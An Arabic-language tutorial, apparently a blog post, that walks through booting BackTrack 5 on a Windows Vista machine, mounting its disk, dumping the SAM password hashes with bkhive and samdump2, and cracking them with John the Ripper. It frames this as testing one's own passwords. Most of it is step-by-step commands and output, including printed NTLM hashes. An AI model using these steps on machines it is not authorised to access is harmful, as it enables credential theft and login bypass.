----------------------------
قبل الدخول في موضوع المقالة, إذا أردت معرفة قوة كلمة المرور التي تستخدمها بدون أن تستعمل برامج معينة لفك تشفير الباسوورد, هذا الموقع يحسب لك الوقت المتوقع لكسر تشفير كلمة المرور التي تستعملها.
----------------------------
تم تطبيق هذه الخطوات على ويندوز فيستا مع توزيعة باك تراك 5
الهدف من المقالة هو
معرفة قوة كلمات المرور التي تستخدمها في الويندوز امام برامج كسر كلمات المرور مثل برنامج جون ذا ريبر
للانتباه إلى هذا النوع من الهجوم الذي قد يستخدمه البعض على جهازك إذا تمكن من الوصول إليه
للمتعة :)
أدخل على توزيعة باك تراك على الجهاز الذي يحتوي على الويندوز, وبعد الإقلاع اكتب في سطر الاوامر: للانتباه إلى هذا النوع من الهجوم الذي قد يستخدمه البعض على جهازك إذا تمكن من الوصول إليه
للمتعة :)
root@bt:~# fdisk -l
Device Boot Start End Blocks Id System
/dev/sda1 1 192 1536000 82 Linux swap / Solaris
Partition 1 does not end on cylinder boundary.
/dev/sda2 * 192 12352 97680384 7 HPFS/NTFS
/dev/sda3 12353 24322 96143297+ 5 Extended
/dev/sda5 12353 20297 63818010+ 83 Linux
لمعرفة مكان الويندوز في الهارد ديسك.
ثم انشئ مجلدا لتحمل عليه الويندوز
mkdir /mnt/sda2
حمل الويندوز (قد يختلف مكان الويندوز لديك)
mount /dev/sda2 /mnt/sda2
ادخل على المجلد الذي يحتوي على كلمات المرور
cd /mnt/sda2/Windows/System32/config
الخطوات التالية لاستخراج ملف كلمات المرور (لاحظ أننا تخطينا طلب كلمة المرور في الويندوز للوصول إلى هذا الملف)
root@bt:/mnt/sda2/Windows/System32/config# bkhive system /tmp/out.txt
root@bt:/mnt/sda2/Windows/System32/config# samdump2 sam /tmp/out.txt > /tmp/hash.txt
الان كلمات المرور المشفرة اصبحت في الملف
/tmp/hash.txt
للتأكد من وجودها نكتب
root@bt:/mnt/sda2/Windows/System32/config# cat /tmp/hash.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
test:1001:aad3b435b51404eeaad3b435b51404ee:eb4ff39b74b0cbce20a4f62dbd1e3585:::
test2:1002:aad3b435b51404eeaad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::
الان اذهب الى المجلد الذي يحتوي على برنامج فك تشفير كلمات المرور جون ذا ريبر
cd /pentest/passwords/john
وننقل إليه ملف كلمات المرور المشفرة
mv /tmp/hash.txt hash.txt
نبدأ في محاولة فك التشفير
./john -format=NT hash.txt
سيقوم البرنامج بمحاولة كل الاحتمالات الممكنة لمطابقة كلمات المرور, وقد تأخذ العملية بعض الوقت على حسب قوة\طول كلمة المرور وسرعة المعالج.